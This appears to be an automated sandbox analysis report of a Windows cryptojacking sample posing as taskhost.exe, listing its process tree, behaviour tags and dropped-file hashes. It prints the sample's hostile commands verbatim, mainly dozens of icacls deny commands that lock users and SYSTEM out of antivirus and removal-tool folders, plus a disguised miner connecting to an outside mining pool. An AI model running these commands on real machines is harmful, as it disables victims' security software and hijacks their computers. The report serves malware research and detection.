4708 wrote to memory of 2088 4708 taskhost.exe cmd.exe PID 2088 wrote to memory of 528 2088 cmd.exe icacls.exe PID 2088 wrote to memory of 528 2088 cmd.exe icacls.exe PID 4708 wrote to memory of 1632 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 1632 4708 taskhost.exe cmd.exe PID 1632 wrote to memory of 1132 1632 cmd.exe icacls.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\sss\ReaItekHD\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\sss\ReaItekHD\taskhost.exe"1⤵
- Modifies visiblity of hidden/system files in Explorer
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exegpupdate /force3⤵
-
C:\ProgramData\Setup\Packs.exeC:\ProgramData\Setup\Packs.exe -ppidar2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls C:\FRST /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\ProgramData\WindowsTask\audiodg.exeC:\ProgramData\WindowsTask\audiodg.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeC:/ProgramData/WindowsTask/MicrosoftHost.exe -o stratum+tcp://zpdb.xyz:3333 -u RandomX_CPU --donate-level=1 -k --cpu-priority=0 -t42⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeFilesize
5.2MB
MD5e8ffe812b5a2d068d85ca363b3517c32
SHA1a12dd68e7cb09bfcf08a3c61162230f92fd74f55
SHA25655bb09f52b39deb0de2a2ec4bd05624ac4de1b6a7a576cc9ac0eaf6342aebb1d
SHA5126b14d3d649e077c0a099de43683939405cefb058398fed2ebcd9a952066413f82f3e4a7a9722141cf86927702deeea1604cb2fc90d2ea5935241e19d523e5a56
-
C:\ProgramData\WindowsTask\WinRing0x64.sysFilesize
14KB
MD50c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
C:\ProgramData\WindowsTask\audiodg.exeFilesize
7.1MB
MD5bcbb6f2d561ea3b6cd8f3cfc13486b9e
SHA152bb4b2d2484f4b2caee8acedfed50e7a4e928e6
SHA25631fcc864de2e72799529a54ab9f7881f99d09100d240b71cd833836f404544c0
SHA5124ade8219aefa089f424152cc4cecad0d988265f3004456963ac7975171c7a7b4f913dca54e55efd641cc0974ff3e1af052148b990e885c28a54c258070146d38
-
C:\Users\Admin\AppData\Local\Temp\aut8A4E.tmpFilesize
9.2MB
MD5eb75a866888052e05a578ffb872a8393
SHA1dbf905d0ab4583e939224ec500a818c958483437
SHA2561fbb5fd5504b31df05a207f7267ecb44cba4fa221e406812c1651f64188557f9
